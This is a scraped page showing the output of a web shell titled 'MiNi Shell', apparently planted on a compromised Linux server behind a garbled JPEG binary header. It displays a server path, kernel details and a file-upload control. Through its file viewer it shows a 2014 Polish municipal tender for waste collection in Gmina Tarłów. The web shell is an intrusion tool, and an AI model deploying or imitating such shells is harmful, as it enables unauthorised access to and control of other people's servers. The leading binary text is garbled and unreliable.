JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141015/341524-N-2014.html

<p class="kh_header"><b>Tarłów: Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Tarłów</b><br>
<b>Numer ogłoszenia: 341524 - 2014; data zamieszczenia: 15.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tarłów , ul. Rynek 2, 27-515 Tarłów, woj. świętokrzyskie, tel. 015 8385111, faks 015 8385120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarlow.neostrada.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Tarłów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Odbiór i 
zagospodarowanie odpadów komunalnych z terenu Gminy Tarłów. 2)Powierzchnia Gminy 
Tarłów wynosi 163,77 km2, przewidywana liczba obsługiwanych mieszkańców około 4140
osoby w zabudowie jednorodzinnej. W skład gminy wchodzi 41 miejscowości: Tarłów, 
Bronisławów, Brzozowa, Cegielnia, Chałupki, Ciszyca Dolna Ciszyca Górna, Ciszyca 
Kolonia, Ciszyca Przewozowa, Czekarzewice Drugie, Czekarzewice Pierwsze, Dąbrowa, 
Dąbrówka, Dorotka, Duranów, Hermanów, Jadwigów, Janów, Julianów, Kolonia Dąbrówka, 
Kolonia Kostusin, Kozłówek, Leopoldów, Leśne Chałupy, Łubowa, Maksymów, 
Mieczysławów, Ostrów, Potoczek, Potoczek Kolonia, Przymiarki, Słupia Nadbrzeżna, Słupia 
Nadbrzeżna Kolonia, Sulejów, Tadeuszów, Teofilów, Tomaszów, Wesołówka, Wólka 
Lipowa, Wólka Tarłowska, Zemborzyn Kościelny. -Szacunkowa liczba gospodarstw na 
terenie Gminy Tarłów do obsługi w zakresie odbioru i zagospodarowania odpadów 
komunalnych wynosi: 1536 -Szacunkowa liczba mieszkańców do obsługi w zakresie odbioru 
i zagospodarowania odpadów komunalnych wynosi: 4140 3)Wykonawca zobowiązany jest do 
odbioru i zagospodarowania całej ilości odpadów komunalnych od właścicieli nieruchomości 
zamieszkałych, w tym: a)tzw. frakcji suchej, w skład której wchodzą:-papier i tektura, - szkło, 
w tym szkło bezbarwne oraz kolorowe, - tworzywa sztuczne, - opakowania wielomateriałowe, 
- metale. b)niesegregowanych (zmieszanych) 4)Wykonawca zobowiązany jest do organizacji 
i prowadzenia na terenie Gminy Tarłów punktu selektywnego zbierania odpadów 
komunalnych, zwanego dalej PSZOK. PSZOK prowadzi zbiórkę dostarczonych we własnym 
zakresie przez właścicieli wszystkich nieruchomości na których zamieszkują mieszkańcy, 
następujących odpadów komunalnych: a)przeterminowane leki i chemikalia, b)zużyte baterie 
i akumulatory, c)zużyty sprzęt elektryczny i elektroniczny, d)odpady budowlano -
remontowe, pochodzące z remontów i innych robót budowlanych wykonywanych we własnym zakresie, na wykonanie których nie jest wymagane uzyskanie pozwolenia na 
budowę, lub na wykonanie których nie jest wymagane zgłoszenie do administracji budowlano 
- architektonicznej, e)meble i inne odpady wielkogabarytowe - powstające w gospodarstwach 
domowych, f)zużyte opony, g)odpady komunalne ulegające biodegradacji w tym odpady 
opakowaniowe ulegające biodegradacji 5)W ramach zamówienia Wykonawca zobowiązany 
będzie odbierać odpady komunalne z następującymi częstotliwościami: a)segregowane 
odpady komunalne: - z terenów zabudowy jednorodzinnej - co najmniej 1 raz na 4 tygodnie, 
b)niesegregowane (zmieszane) odpady komunalne: - z terenów zabudowy jednorodzinnej - co 
najmniej 1 raz na 4 tygodnie c)odpady z PSZOK-u - po zapełnieniu poszczególnych 
kontenerów lub wydzielonych segmentów 6)Wykonawca jest zobowiązany do osiągnięcia w 
danym roku kalendarzowym w odniesieniu do masy odebranych przez siebie odpadów 
komunalnych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi 
metodami papieru, metalu, tworzyw sztucznych, szkła, innych niż niebezpieczne odpadów 
budowlanych i rozbiórkowych - zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 
maja 2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku 
innymi metodami niektórych frakcji odpadów komunalnych (Dz.U.2012.645). Wykonawca 
zobowiązany jest do prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie z 
przepisami ustawy z dnia 14 grudnia 2012r. o odpadach (Dz.U.2013.21) oraz ustawy z dnia 
13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U.2013 poz. 1399). 
Wykonawca zobowiązany jest do przekazania Zamawiającemu raportów miesięcznych 
zawierających informację o ilości i rodzaju odpadów komunalnych zebranych z terenu Gminy 
Tarłów. Raport miesięczny jest podstawą do wystawienia faktury za wykonaną usługę w 
danym miesiącu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających 
stanowiących nie więcej niż 40% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.10.00-2, 90.51.12.00-4, 90.51.13.00-5, 90.51.14.00-6, 90.51.20.00-9, 90.51.30.00-6, 90.51.31.00-7, 90.51.33.00-9, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.Ustala się wadium 
dla całości przedmiotu zamówienia w wysokości: 17 000,00 zł, słownie zł:siedemnaście tysięcy , 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy 
spełniają warunki, dotyczące: Działalność prowadzona na potrzeby wykonania 
przedmiotu zamówienia wymaga posiadania specjalnych uprawnień: a) wpis 
do rejestru działalności regulowanej w zakresie odbierania odpadów 
komunalnych od właścicieli nieruchomości z terenu Gminy Tarłów, b) wpis do 
rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, 
prowadzony przez Głównego Inspektora Ochrony Środowiska,c) zezwolenie 
na transport odpadów wydane przez właściwy organ w zakresie objętym 
przedmiotem zamówienia,d) zezwolenie na zbieranie lub przetwarzanie 
odpadów wydane przez właściwy organ w zakresie objętym przedmiotem 
zamówienia. Warunek ten zostanie spełniony, jeśli Wykonawca złoży 
oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 
Pzp. Ocena zostanie przeprowadzona wg kryterium: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 1 usługi 
odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia w 
okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli 
okres prowadzenia działalności jest krótszy - w tym okresie:wykonanie usługi 
odbierania odpadów komunalnych od co najmniej 3500 osób oraz czasie 
świadczenia tej usługi nie krótszym niż 12 kolejnych miesięcy. Warunek ten 
zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu 
warunków udziału w postępowaniu z art. 22 ust. 1 Pzp. Ocena zostanie 
przeprowadzona wg kryterium: spełnia, spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, 
gdy wykaże, że dysponuje lub będzie dysponował: a)co najmniej dwoma 
pojazdami przystosowanymi do odbierania zmieszanych odpadów 
komunalnych oraz co najmniej dwoma pojazdami przystosowanymi do 
odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej 
jednym pojazdem do odbierania odpadów bez funkcji kompaktującej, b)baząmagazynowo-transportową spełniającą warunki określone w Rozporządzeniu 
Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych 
wymagań w zakresie odbierania odpadów komunalnych od właścicieli 
nieruchomości (Dz.U.2013.122). Warunek ten zostanie spełniony, jeśli 
Wykonawca złoży oświadczenie o spełnianiu warunków udziału w 
postępowaniu z art. 22 ust. 1 Pzp. Ocena zostanie przeprowadzona wg 
kryterium: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o Zamawiający nie wyznacza w tym zakresie warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o Wymagane jest wykazanie przez Wykonawcę: a)posiadania środków 
finansowych lub zdolności kredytowej na kwotę minimum 500 000,00 zł, b) 
posiadania opłaconej polisy, a w przypadku jej braku innego dokumentu 
potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności 
cywilnej w zakresie prowadzonej działalności na kwotę 500 000,00 zł. 
Warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o 
spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp. Ocena 
zostanie przeprowadzona wg kryterium: spełnia/niespełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wynikające ze zmiany aktualnie obowiązujących przepisów w zakresie usługi objętej 
zamówieniem. 2. Wystąpieniem siły wyższej w rozumieniu Kodeksu Cywilnego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.tarlow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Tarłowie ul. Rynek 2 27-515 Tarłów pokój nr:3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 11:00, miejsce: Oferty należy składać w siedzibie zamawiającego: 
Urząd Gminy w Tarłowie ul. Rynek 2 27-515 Tarłów pokój nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com